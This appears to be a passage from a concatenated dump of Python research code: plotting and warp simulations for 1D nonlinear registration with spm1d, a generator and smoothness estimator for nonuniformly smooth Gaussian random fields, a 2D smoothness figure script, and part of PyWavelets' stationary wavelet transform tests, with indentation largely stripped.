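from nlreg1d.data import SimulatedA  # assumed import path

ds = SimulatedA()
print(ds)   # name, file path, array shape, unique group labels
ds.plot()   # per-group curves plus the two group means
plt.show()
```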
#### File: nlreg1d/nlreg1d/plot.py
```python
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import patches
import spm1d
def axes2data(ax, points):
ax.get_xlim()
ax.get_ylim()
t = ax.transAxes + ax.transData.inverted()
return t.transform( points )
def data2axes(ax, points):
ax.get_xlim()
ax.get_ylim()
t = (ax.transAxes + ax.transData.inverted()).inverted()
return t.transform( points )
def plot_multipanel(y, yr, d, n0, colors, parametric=True, ylim=None, alpha_x=None, paired=False, permutations=1000, dvlabel='Dependent variable', xlabel='Domain position (%)', group_labels=None, leg_loc=[(0.99, 0.92), (0.99, 0.92), (0.99, 0.99)]):
d = d[:,1:-1]
Y = np.dstack( [yr[:,1:-1],d] )
J = n0
fontname = 'Helvetica'
glabels = ['Group 1 mean', 'Group 2 mean'] if (group_labels is None) else group_labels
# stats:
if parametric:
if paired:
ti = spm1d.stats.ttest_paired( y[J:], y[:J] ).inference(0.05)
T2i = spm1d.stats.hotellings_paired( Y[J:], Y[:J] ).inference(0.05)
tri = spm1d.stats.ttest_paired( yr[J:], yr[:J] ).inference(0.05/2)
twi = spm1d.stats.ttest_paired( d[J:], d[:J] ).inference(0.05/2)
else:
ti = spm1d.stats.ttest2( y[J:], y[:J] ).inference(0.05)
T2i = spm1d.stats.hotellings2( Y[J:], Y[:J] ).inference(0.05)
tri = spm1d.stats.ttest2( yr[J:], yr[:J] ).inference(0.05/2)
twi = spm1d.stats.ttest2( d[J:], d[:J] ).inference(0.05/2)
else:
if paired:
t = spm1d.stats.nonparam.ttest_paired( y[J:], y[:J] )
T2 = spm1d.stats.nonparam.hotellings_paired( Y[J:], Y[:J] )
tr = spm1d.stats.nonparam.ttest_paired( yr[J:], yr[:J] )
tw = spm1d.stats.nonparam.ttest_paired( d[J:], d[:J] )
else:
t = spm1d.stats.nonparam.ttest2( y[J:], y[:J] )
T2 = spm1d.stats.nonparam.hotellings2( Y[J:], Y[:J] )
tr = spm1d.stats.nonparam.ttest2( yr[J:], yr[:J] )
tw = spm1d.stats.nonparam.ttest2( d[J:], d[:J] )
nperm = -1 if (permutations > t.nPermUnique) else permutations
ti = t.inference(0.05, iterations=nperm, two_tailed=True)
T2i = T2.inference(0.05, iterations=nperm)
tri = tr.inference(0.05, iterations=nperm, two_tailed=True)
twi = tw.inference(0.05, iterations=nperm, two_tailed=True)
# nperm0 = -1 if (permutations > t.nPermUnique) else permutations
# nperm1 = -1 if (permutations > T2.nPermUnique) else permutations
# nperm2 = -1 if (permutations > tr.nPermUnique) else permutations
# nperm3 = -1 if (permutations > tw.nPermUnique) else permutations
# create figure and axes:
fig = plt.figure( figsize=(14,10) )
axw,axh = 0.26, 0.27
# axx = np.linspace( 0.06, 0.42, 0.71)
axx = [0.085, 0.415, 0.730]
axy = np.linspace(0.66, 0.06, 3)
ax0,ax1,ax2 = [plt.axes( [x,axy[0],axw,axh] ) for x in axx]
ax3 = plt.axes( [axx[0],axy[2],axw,axh] )
ax4 = plt.axes( [axx[1]+0.15,axy[1],axw,axh] )
ax5,ax6 = [plt.axes( [x,axy[2],axw,axh] ) for x in axx[1:]]
AX = [ax0,ax1,ax2, ax3, ax4, ax5,ax6]
h0 = ax0.plot( y[:J].T, color=colors[0], lw=0.3 )[0]
h1 = ax0.plot( y[J:].T, color=colors[1], lw=0.3 )[0]
h0 = ax0.plot( y[:J].mean(axis=0), color=colors[0], lw=5 )[0]
h1 = ax0.plot( y[J:].mean(axis=0), color=colors[1], lw=5 )[0]
leg = ax0.legend( [h0,h1], glabels, loc='upper right', bbox_to_anchor=leg_loc[0] )
plt.setp( leg.get_texts(), name=fontname)
ax1.plot( yr[:J].T, color=colors[0], lw=0.3 )
ax1.plot( yr[J:].T, color=colors[1], lw=0.3 )
h0 = ax1.plot( yr[:J].mean(axis=0), color=colors[0], lw=5 )[0]
h1 = ax1.plot( yr[J:].mean(axis=0), color=colors[1], lw=5 )[0]
leg = ax1.legend( [h0,h1], glabels, loc='upper right', bbox_to_anchor=leg_loc[1] )
plt.setp( leg.get_texts(), name=fontname)
h0 = ax2.plot( d[:J].T, color=colors[0], lw=0.3 )[0]
h1 = ax2.plot( d[J:].T, color=colors[1], lw=0.3 )[0]
h2 = ax2.axhline(0, color='k', ls='--')
h0 = ax2.plot( d[:J].mean(axis=0), color=colors[0], lw=5 )[0]
h1 = ax2.plot( d[J:].mean(axis=0), color=colors[1], lw=5 )[0]
leg = ax2.legend( [h0,h1,h2], glabels + ['Null displacement'], loc='upper right', bbox_to_anchor=leg_loc[2] )
plt.setp( leg.get_texts(), name=fontname)
# SPM results:
ti.plot( ax=ax3 )
T2i.plot( ax=ax4 )
tri.plot( ax=ax5 )
twi.plot( ax=ax6 )
# init axes decorations:
for ax in AX:
plt.setp( ax.get_xticklabels() + ax.get_yticklabels(), name=fontname, size=10 )
ax.set_xlim(0, 100)
ax.set_ylabel(None)
[ax.set_xticklabels([]) for ax in [ax1,ax2,ax4]]
# axis labels:
sz = 16
ax0.set_ylabel(dvlabel, name=fontname, size=sz)
ax1.set_ylabel(dvlabel, name=fontname, size=sz)
ax2.set_ylabel('Warp magnitude', name=fontname, size=sz)
ax3.set_ylabel('SPM{t}', name=fontname, size=sz)
ax4.set_ylabel(r'SPM{ $T^2$ }', name=fontname, size=sz)
ax5.set_ylabel('SPM{t}', name=fontname, size=sz)
[ax.set_xlabel(xlabel, name=fontname, size=sz) for ax in [ax3,ax5,ax6]]
# panel labels:
labels = ['A.1', 'B.1', 'B.2', 'A.2', 'B.3', 'B.4', 'B.5']
slabels = ['Linearly registered', 'Nonlinearly registered', 'Displacement fields', 'Statistical analysis', 'Main test (amplitude + timing)', 'Post hoc (amplitude)', 'Post hoc (timing)']
[ax.text(0.03, 0.92, f'({s}) {ss}', name=fontname, size=14, transform=ax.transAxes) for ax,s,ss in zip( AX, labels, slabels ) ]
tx0 = ax1.text(0.01, 1.05, 'Amplitude effects', ha='left', transform=ax1.transAxes)
tx1 = ax2.text(0.99, 1.05, 'Timing effects', ha='right', transform=ax2.transAxes)
plt.setp( [tx0,tx1] , name=fontname, size=16 )
# background panels:
c0,c1 = '0.6', '0.9'
patch0 = patches.Rectangle([0.035,0.005], 0.328, 0.99, facecolor=c0, edgecolor=c0, alpha=0.9, zorder=-1)
patch1 = patches.Rectangle([0.370,0.005], 0.628, 0.99, facecolor=c1, edgecolor=c1, alpha=0.9, zorder=-1)
tx0 = fig.text(0.20, 0.97, '(A) Common univariate approach', ha='center')
# tx1 = fig.text(0.20, 0.48, '( No explicit temporal\neffect consideration )', ha='center')
tx1 = fig.text(0.20, 0.48, '( None )', ha='center')
tx2 = fig.text(0.55, 0.97, '(B) Proposed multivariate approach')
fig.add_artist(patch0)
fig.add_artist(patch1)
plt.setp( [tx0, tx1, tx2], name=fontname, size=20)
x = 0.01
y = np.array(axy) + 0.5*axh
tx0 = fig.text(x, y[0], 'Dependent variables')
tx1 = fig.text(x, y[1], 'Multivariate analysis')
tx2 = fig.text(x, y[2], 'Univariate analysis')
plt.setp( [tx0, tx1, tx2], name=fontname, size=20, rotation=90, va='center')
# tx1.set_size=14
# axis limits:
if ylim is not None:
[ax.set_ylim(*yy) for ax,yy in zip(AX, ylim)]
def add_threshold_label(ax, x0, ti):
s0,s1 = r'$\alpha$ < 0.05', r'$\alpha$ > 0.05'
hax = 0.02
x,y0 = data2axes( ax, [x0, ti.zstar] )
tx0 = ax.text(x, y0+hax, s0, va='bottom')
tx1 = ax.text(x, y0-hax, s1, va='top')
tx = [tx0,tx1]
plt.setp( tx, size=11, name=fontname, transform=ax.transAxes)
return tx
# add threshold labels:
if alpha_x is not None:
add_threshold_label( ax3, alpha_x[0], ti )
add_threshold_label( ax4, alpha_x[1], T2i )
add_threshold_label( ax5, alpha_x[2], tri )
add_threshold_label( ax6, alpha_x[3], twi )
return fig,AX
```
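The `plot_multipanel` routine needs registered data and warps, but the two lightweight coordinate helpers at the top of the module can be sketched in isolation (illustrative; the import path is an assumption):
```python
import matplotlib.pyplot as plt
from nlreg1d.plot import axes2data, data2axes  # assumed import path

fig, ax = plt.subplots()
ax.plot(range(10))
print(axes2data(ax, (0.5, 0.5)))  # axes-fraction (0.5, 0.5) -> data coordinates
print(data2axes(ax, (5.0, 5.0)))  # data point (5, 5) -> axes-fraction coordinates
```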
#### File: nlreg1d/Scripts/sim_warps.py
```python
import numpy as np
from matplotlib import pyplot as plt
from spm1d import rft1d
import nlreg1d as nl
def tstat(y): # one-sample t statistic
return y.mean(axis=0) / y.std(ddof=1, axis=0) * (y.shape[0]**0.5)
def estimate_lkc(r):
'''
Estimate the Lipschitz-Killing curvature of a set of resoduals
Reference:
Taylor (2008) "Random fields of multivariate test statistics"
'''
def _norm(a):
return (a**2).sum(axis=0)**0.5
q = np.diff( r / _norm(r).T , axis=1 )
lkc = _norm( q ).sum()
return lkc
def sim(nsim=200, shape_parameter=0.1, n_random=25, u=np.linspace(2, 5, 21)):
tmax = [] # maximum t-value
fwhme = [] # estimated FWHM
lkce = [] # estimate LKC
for i in range(nsim):
w = nl.random_warp( J, Q, sigma=3, shape_parameter=shape_parameter, n_random=n_random, as_warp_object=True )
# y = w.get_deviation_from_linear_time()[:,1:-1]
y = w.get_displacement_field()[:,1:-1]
r = y - y.mean(axis=0) # residuals
t = tstat( y )
tmax.append( t.max() )
fwhme.append( nl.util.estimate_fwhm(r) )
lkce.append( estimate_lkc(r) )
tmax = np.array(tmax)
# geometry summary:
fwhmE = np.mean( fwhme )
lkcE = np.mean( lkce )
# survival functions:
sf = np.array( [ (tmax>uu).mean() for uu in u] ) # simulation results
sfe = rft1d.t.sf(u, v, Q, fwhmE) # expected
return fwhmE, lkcE, sf,sfe
# set parameters:
np.random.seed(12345)
J = 12 # number of observations
Q = 101 # number of grid points
v = J - 1 # degrees of freedom
nsim = 200 # number of simulated datasets (change this to 10000 to replicate the results in: ./Figures/sim-results.pdf)
u = np.linspace(1, 5, 21) # thresholds for survival function calculation
sps = [10, 1, 0.1, 0.01] # shape_parameter values
nrs = [3, 6, 15, 50] # n_random values
# run simulation:
fwhms,lkcs = [],[]
sfs,sfes = [],[]
for sp,nr in zip(sps,nrs):
results = sim(nsim, shape_parameter=sp, n_random=nr, u=u)
fwhms.append( results[0] )
lkcs.append( results[1] )
sfs.append( results[2] )
sfes.append( results[3] )
# plot:
plt.close('all')
fig,axs = plt.subplots( 2, 2, figsize=(8,6) )
plt.get_current_fig_manager().window.move(0, 0)
fontname = 'Helvetica'
colors = ['r', 'g', 'b', 'k']
for ax,sf,sfe,lkc,fwhm,c in zip(axs.ravel(), sfs, sfes, lkcs, fwhms, colors):
h0 = ax.plot(u, sfe, '-', color=c, label='Theoretical')[0]
h1 = ax.plot(u, sf, 'o', color=c, label='Simulated')[0]
ax.text(0.6, 0.98, 'LKC = %.1f\nFWHM = %.1f'%(lkc,fwhm), transform=ax.transAxes, va='top', color=c, name=fontname)
ax.set_ylim(0, 0.3)
ax.grid(axis='x', color='0.9')
ax.grid(axis='y', color='0.9')
if ax==axs[0,1]:
leg = ax.legend(loc='lower left')
plt.setp( leg.get_texts(), name=fontname, size=10 )
[plt.setp(ax.get_xticklabels()+ax.get_yticklabels(), name=fontname, size=8) for ax in axs.ravel()]
[ax.set_xticklabels([]) for ax in axs[0]]
[ax.set_yticklabels([]) for ax in axs[:,1]]
[ax.set_xlabel(r'$u$', name=fontname, size=14) for ax in axs[1]]
[ax.set_ylabel(r'$P(t_\max > u)$', name=fontname, size=14) for ax in axs[:,0]]
[ax.text(0.03, 0.92, '(%s)'%chr(97+i), name=fontname, size=12, transform=ax.transAxes) for i,ax in enumerate(axs.ravel())]
plt.tight_layout()
plt.show()
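# --------------------------------------------------------------------------
# Illustrative cross-check (an addition, not part of the simulation above):
# for *uniformly* smooth Gaussian fields, the empirical survival function of
# the field maximum should match the RFT expectation directly.
np.random.seed(0)
FWHM, u0 = 20.0, 3.0
tmax0 = []
for _ in range(200):
    y0 = rft1d.randn1d(J, Q, FWHM)
    tmax0.append(tstat(y0).max())
print('P(tmax > %.1f) simulated:   %.3f' % (u0, (np.array(tmax0) > u0).mean()))
print('P(tmax > %.1f) theoretical: %.3f' % (u0, rft1d.t.sf(u0, v, Q, FWHM)))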
``` |
{
"source": "0todd0000/nonuniform1d",
"score": 2
} |
#### File: 0todd0000/nonuniform1d/fig03_terminology2D.py
```python
from math import pi
import numpy as np
from scipy import signal
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import pyplot,cm
import spm1d #www.spm1d.org
import nonuniform1d #(in this repository)
def fn_mypulse2D(x, y, F, lamx, lamy):
return (float(F)/(lamx*lamy)) * (1+ np.cos(2*pi/lamx*x)) * (1+ np.cos(2*pi/lamy*y))
def gen_mypulse2D(F, lamx, lamy, dt=0.1):
tx,ty = np.arange(-lamx/2, lamx/2+dt, dt), np.arange(-lamy/2, lamy/2+dt, dt)
X,Y = np.meshgrid(tx,ty)
Z = fn_mypulse2D(X, Y, F, lamx, lamy)
return X,Y,Z #N/mm2
#(0) Isotropic 2D data:
np.random.seed(0)
m,n = 128,128
I = np.random.randn(m,n)
lam0x,lam0y = 35,35
dt = 1.0
Z0 = gen_mypulse2D(15, lam0x, lam0y, dt)[-1]
I0 = 1.2*signal.convolve2d(I, Z0, boundary='symm', mode='same')
#(1) Nonisotropic 2D data:
np.random.seed(2)
I1 = np.random.randn(m,n)
np.random.seed(1)
I2 = np.random.randn(m,n)
lam1x,lam1y = 80,10
lam2x,lam2y = 10,80
dt = 1.0
Z1 = gen_mypulse2D(15, lam1x, lam1y, dt)[-1]
Z2 = gen_mypulse2D(15, lam2x, lam2y, dt)[-1]
I1 = signal.convolve2d(I1, Z1, boundary='symm', mode='same')
I2 = signal.convolve2d(I2, Z2, boundary='symm', mode='same')
#(2) Plot:
# pyplot.close('all')
fontname = 'Times New Roman'
vmin,vmax = -2, 2
### create figure and axes:
axx = [0.069,0.40]
axy = np.linspace(0.71,0.07,3)
axw = [0.25, 0.55]
axh = [0.25, 0.3]
fig = pyplot.figure(figsize=(7,7))
fig.canvas.set_window_title('Figure 3')
ax1 = [pyplot.axes([axx[1],yy,axw[1],axh[1]], projection='3d') for yy in axy-0.04]
ax0 = [pyplot.axes([axx[0],yy,axw[0],axh[0]]) for yy in axy]
AX = np.array([ax0,ax1]).T
### set fonts and sizes:
[pyplot.setp(ax.get_xticklabels()+ax.get_yticklabels(), name=fontname, size=8) for ax in AX[:,0]]
[pyplot.setp(ax.get_xticklabels()+ax.get_yticklabels()+ax.get_zticklabels(), name=fontname, size=8) for ax in AX[:,1]]
### plot images:
ticks = [0, 32, 64, 96, 128]
ticklabels = ['0', '', '0.5', '', '1']
for ax,I in zip(AX[:,0],[I0,I1,I2]):
ax.imshow(I, cmap='gray', vmin=vmin, vmax=vmax, origin='lower')
ax.set_xticks(ticks)
ax.set_yticks(ticks)
ax.set_xticklabels(ticklabels)
ax.set_yticklabels(ticklabels)
ax.set_xlabel('X', name=fontname, size=14)
ax.set_ylabel('Y', name=fontname, size=14)
cbs = [pyplot.colorbar(cax=pyplot.axes([0.33,yy,0.025,axh[0]]), mappable=AX[0,0].images[0]) for yy in axy]
[pyplot.setp(cb.ax.get_yticklabels(), name=fontname, size=8) for cb in cbs]
[cb.ax.set_ylabel('DV value', name=fontname, size=14) for cb in cbs]
### plot surfaces:
X = np.linspace(0, 1, m)
Y = np.linspace(0, 1, n)
X, Y = np.meshgrid(Y, X)
ticks = [0, 0.25, 0.5, 0.75, 1]
ticklabels = ['0', '', '0.5', '', '1']
for ax,I in zip(AX[:,1],[I0,I1,I2]):
surf = ax.plot_surface(X, Y, I, rstride=3, cstride=3, cmap=cm.gray_r, linewidth=0.2, edgecolor='0.7', antialiased=True)
pyplot.setp(ax, xticks=ticks, yticks=ticks, xticklabels=ticklabels, yticklabels=ticklabels)
pyplot.setp(ax, xlim=(0,1), ylim=(0,1), zlim=(-15,15))
ax.set_xlabel('X', name=fontname, size=14)
ax.set_ylabel('Y', name=fontname, size=14)
ax.set_zlabel('DV value', name=fontname, size=14)
### add panel labels:
labels = 'Isotropic', 'Nonisotropic (X smoother)', 'Nonisotropic (Y smoother)'
yloc = [1.14, 1.00, 1.00]
for i,(ax,label,yy) in enumerate(zip(AX[:,0], labels, yloc)):
ax.text(1.32, yy, '(%s) %s' %(chr(97+i), label), name=fontname, size=14, transform=ax.transAxes, va='top', bbox=dict(color='w', alpha=0.5))
### annotate:
yloc = [0.65, 0.33]
for yy in yloc:
AX[0,0].annotate("", xy=(0, yy), xycoords='figure fraction', xytext=(1, yy), textcoords='figure fraction', arrowprops=dict(arrowstyle="-", color='0.7') )
pyplot.show()
```
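As an aside, the raised-cosine pulse used for smoothing above is separable, and along each axis it integrates to the force parameter `F`. A quick 1D check (an illustrative addition):
```python
import numpy as np

F, lam, dt = 15.0, 35.0, 1.0
x = np.arange(-lam / 2, lam / 2 + dt, dt)
k = (F / lam) * (1 + np.cos(2 * np.pi * x / lam))
print(k.sum() * dt)  # approximately F (Riemann sum of the pulse)
```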
#### File: 0todd0000/nonuniform1d/nonuniform1d.py
```python
from math import sqrt,log
import numpy as np
from matplotlib import pyplot
eps = np.finfo(float).eps # (np.float was removed in NumPy 1.24; use the builtin float)
def gaussian_kernel(sd):
'''
Create a Gaussian kernel with the specified standard deviation (sd)
Modified from scipy.ndimage.filters.gaussian_filter1d
'''
kw = int(4.0 * sd + 0.5) #kernel width
weights = [0.0] * (2 * kw + 1)
weights[kw] = 1.0
sum = 1.0
sd = sd * sd
# calculate the kernel:
for ii in range(1, kw + 1):
tmp = np.exp(-0.5 * float(ii * ii) / sd)
weights[kw + ii] = tmp
weights[kw - ii] = tmp
sum += 2.0 * tmp
for ii in range(2 * kw + 1):
weights[ii] /= sum
return np.array(weights)
def fwhm_exponential(Q, w0, w1):
'''
Exponential smoothness model
Parameters:
Q : number of continuum nodes
w0 : initial smoothness value
w1 : final smoothness value
'''
x = np.linspace(-2, 2, Q)
fwhm = np.exp(x)
fwhm = w0 + w1 * fwhm/fwhm[-1]
return fwhm
def fwhm_gaussian(Q, q, sd, w0, w1):
'''
Gaussian pulse smoothness model
Parameters:
Q : number of continuum nodes
q : location of Gaussian kernel center
sd : standard deviation of the kernel
w0 : baseline smoothness value
w1 : maximum smoothness value
'''
y = np.zeros(Q)
g = gaussian_kernel(sd)
n = g.size
i0 = q - int(n/2)
i1 = q + int(n/2) + 1
if i0 < 0:
n2crop = abs(i0)
i0 = 0
g = g[n2crop:]
if i1 > Q:
n2crop = i1 - Q
i1 = Q
g = g[:-n2crop]
y[i0:i1] = g
amp = w1 - w0
fwhm = w0 + y * amp / y.max()
return fwhm
def fwhm_linear(Q, w0, w1, q0=None, q1=None):
'''
Linear smoothness model
Parameters:
Q : number of continuum nodes
w0 : initial smoothness value
w1 : final smoothness value
q0 : optional starting node for linear increase
q1 : optional ending node for linear increase
'''
q0 = 0 if (q0 is None) else q0
q1 = Q if (q1 is None) else q1
width = q1 - q0
wstep = np.linspace(w0, w1, width)
w = w0 * np.ones(Q)
w[q0:q1] = wstep
w[q1:] = w1
return w
def fwhm_step(Q, w0, w1):
'''
Sigmoid step smoothness model
Parameters:
Q : number of continuum nodes
w0 : initial smoothness value
w1 : final smoothness value
'''
dx = 5
x = np.linspace(-5, 5, Q)
fwhm = w0 + (w1-w0) / (1 + np.exp(-dx*x))
return fwhm
def fwhm_double_step(Q, w0, w1, w2):
'''
Double sigmoid step smoothness model
Parameters:
Q : number of continuum nodes
w0 : initial smoothness value
w1 : intermediary smoothness value
w2 : final smoothness value
'''
dx = 5
n = int(Q/2)
n0,n1 = (n+1,n) if Q%2 else (n,n)
x0 = np.linspace(-5, +2.5, n0)
x1 = np.linspace(-2.4, +5, n1)
fwhm0 = w0 + (w1-w0) / (1 + np.exp(-dx*x0))
fwhm1 = w1 + (w2-w1) / (1 + np.exp(-dx*x1))
fwhm = np.hstack([fwhm0,fwhm1])
return fwhm
def generate_fwhm_continuum(type='linear', *args):
'''
Generate a 1D FWHM continuum as a model of underlying data smoothness
Parameters:
type : one of ["linear", "exponential", "gaussian", "step", "double_step"]
args : model-dependent arguments; see documentation from fwhm* functions
'''
if type == 'double_step':
fn = fwhm_double_step
elif type == 'linear':
fn = fwhm_linear
elif type == 'exponential':
fn = fwhm_exponential
elif type == 'step':
fn = fwhm_step
elif type == 'gaussian':
fn = fwhm_gaussian
else:
raise ValueError('unknown smoothness model type: %r' % type)
return fn(*args)
def estimate_fwhm(R, mean=True):
resels = estimate_resels(R, mean=False)
fwhm = 1 / resels
if mean:
fwhm = fwhm.mean()
return fwhm
def estimate_resels(R, mean=True):
'''
Estimate local continuum smoothness.
NOTE: Only use this function to approximate local smoothness!
Robust smoothness estimation must be done only at the continuum level,
as implemented in **spm1d.rft1d.geom.estimate_fwhm**
This code is adapted from **spm1d.rft1d.geom.estimate_fwhm**
'''
ssq = (R**2).sum(axis=0)
### gradient estimation (Method 2)
dy,dx = np.gradient(R)
v = (dx**2).sum(axis=0)
# normalize:
v /= (ssq + eps)
# ignore zero-variance nodes:
i = np.isnan(v)
v = v[np.logical_not(i)]
# node-wise resels estimates:
resels = np.sqrt(v / (4*log(2)))
if mean:
resels = resels.mean()
return resels
def randn1dnu(J, FWHM):
'''
Nonuniformly smooth 1D Gaussian random continuum generator
Parameters:
J : sample size (integer)
FWHM : one-dimensional NumPy array representing continuum smoothness
Outputs:
y : a random sample of J continua, each with length FWHM.size
'''
Q = FWHM.size
z = np.random.randn(Q, J)
s = FWHM / ( (Q-1) * sqrt( 4*log(2) ) )
dx = 1. / (Q -1)
x = np.array([dx * np.arange(Q)])
X = np.repeat(x, Q, 0)
D = X - np.repeat(x.T, Q, 1) # distance matrix (relative to diagonal nodes)
A = np.exp(-0.5*D**2 / (s**2) )
[U,V] = np.linalg.eig(A.T)
U,V = np.real(U), np.real(V)
U[U<eps] = 0
U,V = np.matrix(np.diag( np.sqrt(U) )), np.matrix(V)
C = V * U * V.T
y = (C * z).T
return np.asarray(y)
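if __name__ == '__main__':
    # illustrative self-test (an addition): generate nonuniformly smooth
    # Gaussian continua from a linear FWHM model, then check that node-wise
    # smoothness estimates roughly track the model
    np.random.seed(0)
    Q = 101
    fwhm_model = generate_fwhm_continuum('linear', Q, 5.0, 25.0)
    y = randn1dnu(200, fwhm_model)
    r = y - y.mean(axis=0)  # residuals
    fwhm_est = estimate_fwhm(r, mean=False)
    print('model FWHM (first/last node):     %.1f / %.1f' % (fwhm_model[0], fwhm_model[-1]))
    print('estimated FWHM (first/last node): %.1f / %.1f' % (fwhm_est[0], fwhm_est[-1]))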
``` |
{
"source": "0-tree/pywt",
"score": 2
} |
#### File: pywt/tests/test_swt.py
```python
from __future__ import division, print_function, absolute_import
import warnings
from copy import deepcopy
from itertools import combinations
import numpy as np
from numpy.testing import (run_module_suite, dec, assert_allclose, assert_,
assert_equal, assert_raises, assert_array_equal,
assert_warns)
import pywt
from pywt._extensions._swt import swt_axis
# Check that float32 and complex64 are preserved. float16 is promoted to
# float32, and other real types are converted to float64.
dtypes_in = [np.int8, np.float16, np.float32, np.float64, np.complex64,
np.complex128]
dtypes_out = [np.float64, np.float32, np.float32, np.float64, np.complex64,
np.complex128]
# tolerances used in accuracy comparisons
tol_single = 1e-6
tol_double = 1e-13
####
# 1d multilevel swt tests
####
def test_swt_decomposition():
x = [3, 7, 1, 3, -2, 6, 4, 6]
db1 = pywt.Wavelet('db1')
atol = tol_double
(cA3, cD3), (cA2, cD2), (cA1, cD1) = pywt.swt(x, db1, level=3)
expected_cA1 = [7.07106781, 5.65685425, 2.82842712, 0.70710678,
2.82842712, 7.07106781, 7.07106781, 6.36396103]
assert_allclose(cA1, expected_cA1, rtol=1e-8, atol=atol)
expected_cD1 = [-2.82842712, 4.24264069, -1.41421356, 3.53553391,
-5.65685425, 1.41421356, -1.41421356, 2.12132034]
assert_allclose(cD1, expected_cD1, rtol=1e-8, atol=atol)
expected_cA2 = [7, 4.5, 4, 5.5, 7, 9.5, 10, 8.5]
assert_allclose(cA2, expected_cA2, rtol=tol_double, atol=atol)
expected_cD2 = [3, 3.5, 0, -4.5, -3, 0.5, 0, 0.5]
assert_allclose(cD2, expected_cD2, rtol=tol_double, atol=atol)
expected_cA3 = [9.89949494, ] * 8
assert_allclose(cA3, expected_cA3, rtol=1e-8, atol=atol)
expected_cD3 = [0.00000000, -3.53553391, -4.24264069, -2.12132034,
0.00000000, 3.53553391, 4.24264069, 2.12132034]
assert_allclose(cD3, expected_cD3, rtol=1e-8, atol=atol)
# level=1, start_level=1 decomposition should match level=2
res = pywt.swt(cA1, db1, level=1, start_level=1)
cA2, cD2 = res[0]
assert_allclose(cA2, expected_cA2, rtol=tol_double, atol=atol)
assert_allclose(cD2, expected_cD2, rtol=tol_double, atol=atol)
coeffs = pywt.swt(x, db1)
assert_(len(coeffs) == 3)
assert_equal(pywt.swt_max_level(len(x)), 3)
def test_swt_max_level():
# odd sized signal will warn about no levels of decomposition possible
assert_warns(UserWarning, pywt.swt_max_level, 11)
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
assert_equal(pywt.swt_max_level(11), 0)
# no warnings when >= 1 level of decomposition possible
assert_equal(pywt.swt_max_level(2), 1) # divisible by 2**1
assert_equal(pywt.swt_max_level(4*3), 2) # divisible by 2**2
assert_equal(pywt.swt_max_level(16), 4) # divisible by 2**4
assert_equal(pywt.swt_max_level(16*3), 4) # divisible by 2**4
def test_swt_axis():
x = [3, 7, 1, 3, -2, 6, 4, 6]
db1 = pywt.Wavelet('db1')
(cA2, cD2), (cA1, cD1) = pywt.swt(x, db1, level=2)
# test cases use 2D arrays based on tiling x along an axis and then
# calling swt along the other axis.
for order in ['C', 'F']:
# test SWT of 2D data along default axis (-1)
x_2d = np.asarray(x).reshape((1, -1))
x_2d = np.concatenate((x_2d, )*5, axis=0)
if order == 'C':
x_2d = np.ascontiguousarray(x_2d)
elif order == 'F':
x_2d = np.asfortranarray(x_2d)
(cA2_2d, cD2_2d), (cA1_2d, cD1_2d) = pywt.swt(x_2d, db1, level=2)
for c in [cA2_2d, cD2_2d, cA1_2d, cD1_2d]:
assert_(c.shape == x_2d.shape)
# each row should match the 1D result
for row in cA1_2d:
assert_array_equal(row, cA1)
for row in cA2_2d:
assert_array_equal(row, cA2)
for row in cD1_2d:
assert_array_equal(row, cD1)
for row in cD2_2d:
assert_array_equal(row, cD2)
# test SWT of 2D data along other axis (0)
x_2d = np.asarray(x).reshape((-1, 1))
x_2d = np.concatenate((x_2d, )*5, axis=1)
if order == 'C':
x_2d = np.ascontiguousarray(x_2d)
elif order == 'F':
x_2d = np.asfortranarray(x_2d)
(cA2_2d, cD2_2d), (cA1_2d, cD1_2d) = pywt.swt(x_2d, db1, level=2,
axis=0)
for c in [cA2_2d, cD2_2d, cA1_2d, cD1_2d]:
assert_(c.shape == x_2d.shape)
# each column should match the 1D result
for row in cA1_2d.transpose((1, 0)):
assert_array_equal(row, cA1)
for row in cA2_2d.transpose((1, 0)):
assert_array_equal(row, cA2)
for row in cD1_2d.transpose((1, 0)):
assert_array_equal(row, cD1)
for row in cD2_2d.transpose((1, 0)):
assert_array_equal(row, cD2)
# axis too large
assert_raises(ValueError, pywt.swt, x, db1, level=2, axis=5)
def test_swt_iswt_integration():
# This function performs a round-trip swt/iswt transform test on
# all available types of wavelets in PyWavelets - except the
# 'dmey' wavelet. The latter has been excluded because it does not
# produce very precise results. This is likely due to the fact
# that the 'dmey' wavelet is a discrete approximation of a
# continuous wavelet. All wavelets are tested up to 3 levels. The
# test validates neither swt or iswt as such, but it does ensure
# that they are each other's inverse.
max_level = 3
wavelets = pywt.wavelist(kind='discrete')
if 'dmey' in wavelets:
# The 'dmey' wavelet seems to be a bit special - disregard it for now
wavelets.remove('dmey')
for current_wavelet_str in wavelets:
current_wavelet = pywt.Wavelet(current_wavelet_str)
input_length_power = int(np.ceil(np.log2(max(
current_wavelet.dec_len,
current_wavelet.rec_len))))
input_length = 2**(input_length_power + max_level - 1)
X = np.arange(input_length)
coeffs = pywt.swt(X, current_wavelet, max_level)
Y = pywt.iswt(coeffs, current_wavelet)
assert_allclose(Y, X, rtol=1e-5, atol=1e-7)
def test_swt_dtypes():
wavelet = pywt.Wavelet('haar')
for dt_in, dt_out in zip(dtypes_in, dtypes_out):
errmsg = "wrong dtype returned for {0} input".format(dt_in)
# swt
x = np.ones(8, dtype=dt_in)
(cA2, cD2), (cA1, cD1) = pywt.swt(x, wavelet, level=2)
assert_(cA2.dtype == cD2.dtype == cA1.dtype == cD1.dtype == dt_out,
"swt: " + errmsg)
# swt2
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
x = np.ones((8, 8), dtype=dt_in)
cA, (cH, cV, cD) = pywt.swt2(x, wavelet, level=1)[0]
assert_(cA.dtype == cH.dtype == cV.dtype == cD.dtype == dt_out,
"swt2: " + errmsg)
def test_swt_roundtrip_dtypes():
# verify perfect reconstruction for all dtypes
rstate = np.random.RandomState(5)
wavelet = pywt.Wavelet('haar')
for dt_in, dt_out in zip(dtypes_in, dtypes_out):
# swt, iswt
x = rstate.standard_normal((8, )).astype(dt_in)
c = pywt.swt(x, wavelet, level=2)
xr = pywt.iswt(c, wavelet)
assert_allclose(x, xr, rtol=1e-6, atol=1e-7)
# swt2, iswt2
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
x = rstate.standard_normal((8, 8)).astype(dt_in)
c = pywt.swt2(x, wavelet, level=2)
xr = pywt.iswt2(c, wavelet)
